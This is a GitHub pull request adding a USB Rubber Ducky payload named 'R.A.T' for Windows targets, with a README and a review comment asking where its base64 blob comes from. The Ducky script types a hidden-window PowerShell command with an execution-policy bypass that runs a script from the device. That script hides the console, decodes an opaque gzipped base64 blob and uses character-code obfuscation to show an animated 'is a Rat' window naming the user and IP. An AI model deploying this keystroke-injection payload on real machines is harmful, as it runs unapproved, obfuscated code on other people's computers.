New Payload - R.A.T #429
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,59 @@ | ||
| function Hide-ConsoleWindow() { | ||
| $ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' | ||
| $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru | ||
|
|
||
| $hwnd = (Get-Process -PID $pid).MainWindowHandle | ||
| if ($hwnd -ne [System.IntPtr]::Zero) { | ||
| # When you got HWND of the console window: | ||
| # (It would appear that Windows Console Host is the default terminal application) | ||
| $ShowWindowAsync::ShowWindowAsync($hwnd, 0) | ||
| } else { | ||
| # When you failed to get HWND of the console window: | ||
| # (It would appear that Windows Terminal is the default terminal application) | ||
|
|
||
| # Mark the current console window with a unique string. | ||
| $UniqueWindowTitle = New-Guid | ||
| $Host.UI.RawUI.WindowTitle = $UniqueWindowTitle | ||
| $StringBuilder = New-Object System.Text.StringBuilder 1024 | ||
|
|
||
| # Search the process that has the window title generated above. | ||
| $TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle }) | ||
| # Get the window handle of the terminal process. | ||
| # Note that GetConsoleWindow() in Win32 API returns the HWND of | ||
| # powershell.exe itself rather than the terminal process. | ||
| # When you call ShowWindowAsync(HWND, 0) with the HWND from GetConsoleWindow(), | ||
| # the Windows Terminal window will be just minimized rather than hidden. | ||
| $hwnd = $TerminalProcess.MainWindowHandle | ||
| if ($hwnd -ne [System.IntPtr]::Zero) { | ||
| $ShowWindowAsync::ShowWindowAsync($hwnd, 0) | ||
| } else { | ||
| Write-Host "Failed to hide the console window." | ||
| } | ||
| } | ||
| } | ||
| Hide-ConsoleWindow; | ||
| [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms"); | ||
| Add-Type -Assembly PresentationFramework | ||
| $I = New-Object System.IO.MemoryStream(,[Convert]::FromBase64String('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')) | ||
| $O = New-Object System.IO.MemoryStream; | ||
| $Z = New-Object System.IO.Compression.GzipStream $I, ([IO.Compression.CompressionMode]::Decompress); | ||
| $Z.CopyTo($O); | ||
| $Z.Close(); | ||
| $I.Close(); | ||
| $GR = $true; | ||
| $S = [System.Windows.Forms.Screen]::PrimaryScreen; | ||
| $W = [Windows.Markup.XamlReader]::Load((New-Object System.Xml.XmlNodeReader([xml][System.Text.Encoding]::UTF8.GetString($O.ToArray())))); | ||
| $O.Close(); | ||
| $R = $W.FindName("R"); | ||
| $X = $W.FindName("U"); | ||
| $X.Text = "$U`n$([char]64)$IP`n$([char]105+[char]115+[char]32+[char]97+[char]32+[char]82+[char]97+[char]116)"; | ||
| $H = [Windows.Input.MouseButtonEventHandler]{$W.Close();$_.Handled=$true;} | ||
| $W.Add_MouseRightButtonDown($H); | ||
| $W.Left = $S.WorkingArea.Left; | ||
| $W.Top = $S.Bounds.Height - $W.Height; | ||
| $T = New-Object System.Windows.Forms.Timer; | ||
| $T.Interval = 100; | ||
| $T.add_Tick({if($GR){if(($W.Left+5)-lt($S.WorkingArea.Width-$W.Width)){$W.Left=($W.Left+5)}else{$R.ScaleX=-1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"100,0,0,0" }}else{if(($W.Left-5)-gt0){$W.Left=($W.Left-5)}else{$R.ScaleX=1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"0"}}}); | ||
| $W.Add_Closing({$T.Stop();$T.Dispose();}) | ||
| $T.Start(); | ||
| $W.ShowDialog(); | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| REM TITLE R.A.T | ||
| REM AUTHOR TRIBBIC | ||
| REM DESCRIPTION Set up a R.A.T on the target windows machine | ||
| REM DUCKY SCRIPT 3 | ||
|
|
||
| REM USERNAME to login to the R.A.T | ||
| DEFINE #USERNAME name | ||
| REM Your IP Address use https://www.ipchicken.com/ to get your IP | ||
| DEFINE #IPADDRESS 192.168.1.1 | ||
| ATTACKMODE HID STORAGE | ||
| EXTENSION DETECT_READY | ||
| REM VERSION 1.1 | ||
| REM AUTHOR: Korben | ||
|
|
||
| REM_BLOCK DOCUMENTATION | ||
| USAGE: | ||
| Extension runs inline (here) | ||
| Place at beginning of payload (besides ATTACKMODE) to act as dynamic | ||
| boot delay | ||
|
|
||
| TARGETS: | ||
| Any system that reflects CAPSLOCK will detect minimum required delay | ||
| Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms | ||
| END_REM | ||
|
|
||
| REM CONFIGURATION: | ||
| DEFINE #RESPONSE_DELAY 25 | ||
| DEFINE #ITERATION_LIMIT 120 | ||
|
|
||
| VAR $C = 0 | ||
| WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) | ||
| CAPSLOCK | ||
| DELAY #RESPONSE_DELAY | ||
| $C = ($C + 1) | ||
| END_WHILE | ||
| CAPSLOCK | ||
| END_EXTENSION | ||
|
|
||
| GUI r | ||
| DELAY 200 | ||
| STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1') | ||
|
There was a problem hiding this comment. I would suggest using a DEFINE for those who may not be using the default drive label of "DUCKY" you would do this by adding to the top of the payload: |
||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,22 @@ | ||
| # RAT | ||
| - Author: TRIBBIC | ||
| - Version: 1.0 | ||
| - Target: Windows 10 (Powershell 5.1+) | ||
| - Category: Execution | ||
| - Attackmode: HID & Storage | ||
| - Ducky Script Version: 3 | ||
|
|
||
| ## Setup | ||
| In the payload.txt change the two DEFINE's | ||
|
|
||
| \#USERNAME Should be your login name | ||
|
|
||
| \#IPADDRESS Should be your IP Address | ||
|
|
||
| ## Description | ||
| Create a R.A.T using Windows Powershell on Targets PC | ||
|
|
||
| ## Change Log | ||
| | Version | Changes | | ||
| | ------- | --------------- | | ||
| | 1.0 | Initial release | |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please either provide the source or explain how this base64 is derived.